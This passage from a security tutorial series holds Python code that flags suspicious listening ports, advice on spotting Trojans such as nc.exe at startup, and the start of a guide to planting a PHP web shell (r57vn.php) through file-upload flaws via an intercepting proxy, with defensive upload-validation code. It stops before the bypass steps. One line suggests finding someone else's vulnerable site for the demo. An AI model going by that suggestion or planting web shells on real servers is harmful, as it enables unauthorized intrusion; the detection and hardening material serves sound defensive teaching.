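        if (proto, port) in PORT_INDEX:
            reason = "port listed for " + PORT_INDEX[(proto, port)]
        elif (proto, port) not in expected:
            reason = "not in the baseline of expected listeners"
        else:
            continue
        peers = sorted(r for p, lp, r, s in rows
                       if (p, lp, s) == (proto, port, "ESTABLISHED"))
        findings.append((proto, port, reason, peers))
    return findings


if __name__ == "__main__":
    for finding in review_listeners(SAMPLE_NETSTAT):
        print(finding)
```

    A match on a listed port is a lead to follow up with Fport or TCPView, which show the owning program, not proof of infection; the baseline check is what catches operator-chosen ports such as 8800.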

    b. How to detect running programs

    - Use the Process Viewer software: every process is displayed, even one that runs hidden and does not appear in the Windows Task Manager.

    c. Finding a program that runs at startup

    - In Startup

    - In the Registry: most will be found here. Use the Msconfig command and look at the Startup tab; any program that is meant to run automatically has to be listed there.

    In this example I can see that nc.exe runs at startup and that it is located in the folder c:\vnexperts.net

    8. How to defend against Trojans and backdoors

    - Do not use untrusted software (sometimes even trusted software carries Trojans)

    - Do not visit dangerous websites, and do not install ActiveX controls or JavaScript from websites, because Trojans may come attached

    - Most important of all, update the OS regularly

    - Install reputable antivirus software. I usually use Kaspersky Internet Security, Norton Internet Security and McAfee Total Security, but I hear there are many other good antivirus and anti-Trojan programs. After installing such software, update it regularly.

    9. Conclusion.

    In this article I have covered the basic concepts of what Trojans and backdoors are and how they infect a system, and demonstrated a few Trojans so that you understand how dangerous they are. Most important of all, protect your own environment against attacks from outside.

    By Tocbatdat, Vnexperts Research Department

    Part VIII. Hacking a website by uploading a PHP file, and how to defend against it

    Commercial websites and home-grown PHP forums that allow image uploads are very easily attacked by hackers who upload a shell and take control. In this article I will walk through the technique of uploading a PHP file to take control of the server, and show website administrators how to defend against this flaw.

    When tested with reputable scanning tools such as Acunetix or IBM App Scan, this vulnerability is rated only Low, meaning low severity, yet it can lead to control of the web server. The most important aim of the article is for web administrators to understand the hidden risks, how they are exploited, and how to defend against them.

    The article is divided into these sections:

    1. Required tools

    2. The technique of uploading a PHP file and taking control of the web server

    3. Securing the web server to fix this vulnerability

    I. Required tools

    - Burpsuite_v1.3

    - Java framework

    - firefox

    - a vulnerable website

    - r57vn.php

    1. Burpsuite_v1.3

    This tool is written in Java, so Java must be installed before it can run. It works as a web proxy, but it is an intercepting proxy.

    Intercepting proxy: a proxy that allows the content of the packets the user sends to the web server to be modified. Using this tool therefore makes it possible to change the content of the requests the web browser sends to the web server.

    Link download: http://www.portswigger.net/suite/burpsuite_v1.3.zip

    1. Java

    This is the Java installer, which lets Java programs run on the computer.

    Link download: http://sun.com

    2. firefox

    Firefox is used because some of the techniques do not work with IE.

    3. A vulnerable website

    I do not recommend that anyone go and hack other people's websites. White-hat hackers only hack websites with the permission of the site's owner. In this article I will hack directly into my own website, http://tocbatdat.com. The site is built on PHP and has the vulnerability.

    4. r57vn.php

    A shell that makes it simple to carry out many tasks on the web server.

    II. The technique of uploading a PHP file and taking control of the web server

    1. Preparation

    Step 1: Install Java

    Step 2: Download burpsuite_v1.3 and extract it; once you see the .jar file, stop there

    Step 3: Install firefox

    Step 4: Prepare the IE browser (IE is used to upload the file), because configuring a proxy in IE is simpler

    Step 5: Connect to the Internet and open the website http://tocbatdat.com (in case I have fixed the vulnerability on this website, you can find another website with this vulnerability for the demo).

    2. Uploading the PHP file to the website

    a. General knowledge

    Most websites today only allow certain kinds of file to be uploaded, such as jpg, gif, ..., and do not allow other file formats. So how would a PHP file be uploaded to such a website?

    First we have to understand how the website detects that a file is not one of the permitted formats. There are two ways a website checks:

    + Checking the file format (this is very common)

    + Checking the file extension (this is less common)
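    From the administrator's side, neither check helps if it relies on what the browser sends, because an intercepting proxy can rewrite the request before it reaches the server. The following added example (not the code of the website discussed here) shows a server-side decision that ignores the declared type; it assumes the "file format" check refers to the type declared in the request, and the allowlist and the name validate_upload are hypothetical.

```python
import os
import secrets

# Allowed image types: final extension -> accepted leading file signatures.
ALLOWED = {
    ".jpg": (b"\xff\xd8\xff",),
    ".jpeg": (b"\xff\xd8\xff",),
    ".gif": (b"GIF87a", b"GIF89a"),
}


def validate_upload(filename, declared_type, data):
    """Decide server-side whether an upload is stored.

    Returns (True, stored_name) or (False, reason). declared_type (the
    Content-Type sent with the file) plays no part in the decision: it comes
    from the client and can be rewritten in transit by an intercepting proxy.
    """
    if "\x00" in filename:
        return False, "NUL byte in filename"
    base = os.path.basename(filename.replace("\\", "/"))
    ext = os.path.splitext(base)[1].lower()
    signatures = ALLOWED.get(ext)
    if signatures is None:
        return False, "extension %r is not on the allowlist" % ext
    if not data.startswith(signatures):
        return False, "content does not start with a %s signature" % ext
    # Never reuse the client's name: the stored name is random and carries only
    # the allowlisted extension, so a name such as x.php.jpg cannot survive.
    # Store the file outside any directory where the web server runs scripts.
    return True, secrets.token_hex(16) + ext


if __name__ == "__main__":
    gif = b"GIF89a" + b"\x00" * 16          # constructed sample bytes
    print(validate_upload("avatar.gif", "image/gif", gif))
    print(validate_upload("avatar.php", "image/gif", gif))
    print(validate_upload("avatar.jpg", "image/jpeg", b"plain text"))
```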
